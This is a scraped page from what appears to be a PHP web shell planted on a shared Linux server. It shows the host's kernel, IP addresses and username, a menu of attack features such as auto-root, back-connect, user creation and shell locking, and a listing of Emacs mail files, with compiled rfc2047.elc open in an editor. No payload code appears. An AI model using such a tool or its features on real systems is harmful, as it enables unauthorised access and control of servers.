Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
8.56
KB
-rw-r--r--
blessmail.el
2.5
KB
-rw-r--r--
emacsbug.elc
15
KB
-rw-r--r--
feedmail.elc
98.21
KB
-rw-r--r--
flow-fill.elc
3.15
KB
-rw-r--r--
footnote.elc
26.54
KB
-rw-r--r--
hashcash.elc
10.83
KB
-rw-r--r--
ietf-drums.elc
8.65
KB
-rw-r--r--
mail-extr.elc
32.53
KB
-rw-r--r--
mail-hist.elc
13.44
KB
-rw-r--r--
mail-parse.elc
2.3
KB
-rw-r--r--
mail-prsvr.elc
1.08
KB
-rw-r--r--
mail-utils.elc
10.13
KB
-rw-r--r--
mailabbrev.elc
14.4
KB
-rw-r--r--
mailalias.elc
14.49
KB
-rw-r--r--
mailclient.elc
4.13
KB
-rw-r--r--
mailheader.elc
5.54
KB
-rw-r--r--
metamail.elc
4.21
KB
-rw-r--r--
mspools.elc
8.74
KB
-rw-r--r--
qp.elc
4.14
KB
-rw-r--r--
reporter.elc
9
KB
-rw-r--r--
rfc2045.elc
826
B
-rw-r--r--
rfc2047.elc
24.87
KB
-rw-r--r--
rfc2231.elc
6.35
KB
-rw-r--r--
rfc2368.elc
2.32
KB
-rw-r--r--
rfc822.elc
5.45
KB
-rw-r--r--
rmail-loaddefs.el
7.79
KB
-rw-r--r--
rmail-spam-filter.elc
12.71
KB
-rw-r--r--
rmail.elc
124.13
KB
-rw-r--r--
rmailedit.elc
9.82
KB
-rw-r--r--
rmailkwd.elc
4.98
KB
-rw-r--r--
rmailmm.elc
41.24
KB
-rw-r--r--
rmailmsc.elc
1.34
KB
-rw-r--r--
rmailout.elc
17.84
KB
-rw-r--r--
rmailsort.elc
6.17
KB
-rw-r--r--
rmailsum.elc
54.29
KB
-rw-r--r--
sendmail.elc
53.92
KB
-rw-r--r--
smtpmail.elc
25.46
KB
-rw-r--r--
supercite.elc
57.29
KB
-rw-r--r--
uce.elc
7.54
KB
-rw-r--r--
undigest.elc
7.81
KB
-rw-r--r--
unrmail.elc
5.25
KB
-rw-r--r--
uudecode.elc
5.26
KB
-rw-r--r--
yenc.elc
3.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rfc2047.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\300\303!\210\300\304!\210\305\306\307\"\210\310\311\312\313\314\315\316\317&\210\320\321\322\323\324DD\325\326\327%\207" [require mm-util ietf-drums mail-prsvr rfc2045 autoload mm-body-7-or-8 "mm-bodies" custom-declare-group rfc2047 nil "RFC2047 messages." :group mail :prefix "rfc2047-" custom-declare-variable rfc2047-header-encoding-alist funcall function #[0 "\300\207" [(("Newsgroups") ("Followup-To") ("Message-ID") ("\\(Resent-\\)?\\(From\\|Cc\\|To\\|Bcc\\|\\(In-\\)?Reply-To\\|Sender\\|Mail-Followup-To\\|Mail-Copies-To\\|Approved\\)" . address-mime) (t . mime))] 1] "Header/encoding method alist.\nThe list is traversed sequentially. The keys can either be\nheader regexps or t.\n\nThe values can be:\n\n1) nil, in which case no encoding is done;\n2) `mime', in which case the header will be encoded according to RFC2047;\n3) `address-mime', like `mime', but takes account of the rules for address\n fields (where quoted strings and comments must be treated separately);\n4) a charset, in which case it will be encoded as that charset;\n5) `default', in which case the field will be encoded as the rest\n of the article." :type (alist :key-type (choice regexp (const t)) :value-type (choice (const nil) (const mime) (const address-mime) coding-system (const default)))] 8) #@164 Alist of MIME charsets to RFC2047 encodings. Valid encodings are nil, `Q' and `B'. These indicate binary (no) encoding, quoted-printable and base64 respectively. (defvar rfc2047-charset-encoding-alist '((us-ascii) (iso-8859-1 . Q) (iso-8859-2 . Q) (iso-8859-3 . Q) (iso-8859-4 . Q) (iso-8859-5 . B) (koi8-r . B) (iso-8859-7 . B) (iso-8859-8 . B) (iso-8859-9 . Q) (iso-8859-14 . Q) (iso-8859-15 . Q) (iso-2022-jp . B) (iso-2022-kr . B) (gb2312 . B) (gbk . B) (gb18030 . B) (big5 . B) (cn-big5 . B) (cn-gb . B) (cn-gb-2312 . B) (euc-kr . B) (iso-2022-jp-2 . B) (iso-2022-int-1 . B) (viscii . Q)) (#$ . 1736)) #@51 Alist of RFC2047 encodings to encoding functions. (defvar rfc2047-encode-function-alist '((Q . rfc2047-q-encode-string) (B . rfc2047-b-encode-string) (nil . identity)) (#$ . 2350)) #@48 Whether encoded words should be encoded again. (defvar rfc2047-encode-encoded-words t (#$ . 2537)) (byte-code "\300\301\302\303\304DD\305\306\307%\207" [custom-declare-variable rfc2047-allow-irregular-q-encoded-words funcall function #[0 "\300\207" [t] 1] "Whether to decode irregular Q-encoded words." :type boolean] 6) #@35 Regexp that matches encoded word. (defconst rfc2047-encoded-word-regexp "=\\?\\([^][ - ()<>@,;:*\\\"/?.=]+\\)\\(?:\\*[^?]+\\)?\\?\\(B\\?[+/0-9A-Za-z]*=*\\|Q\\?[ ->@-~]*\\)\\?=" (#$ . 2864)) #@61 Regexp that matches encoded word allowing loose Q encoding. (defconst rfc2047-encoded-word-regexp-loose "=\\?\\([^][ - ()<>@,;:*\\\"/?.=]+\\)\\(?:\\*[^?]+\\)?\\?\\(B\\?[+/0-9A-Za-z]*=*\\|Q\\?\\(?:\\?+[ -<>@-~]\\)?\\(?:[ ->@-~]+\\?+[ -<>@-~]\\)*[ ->@-~]*\\?*\\)\\?=" (#$ . 3060)) #@97 Return the type with which to encode the buffer. This is either `base64' or `quoted-printable'. (defalias 'rfc2047-qp-or-base64 #[0 "\212d\300e\\^\301eb\210\302w\210`W\203\"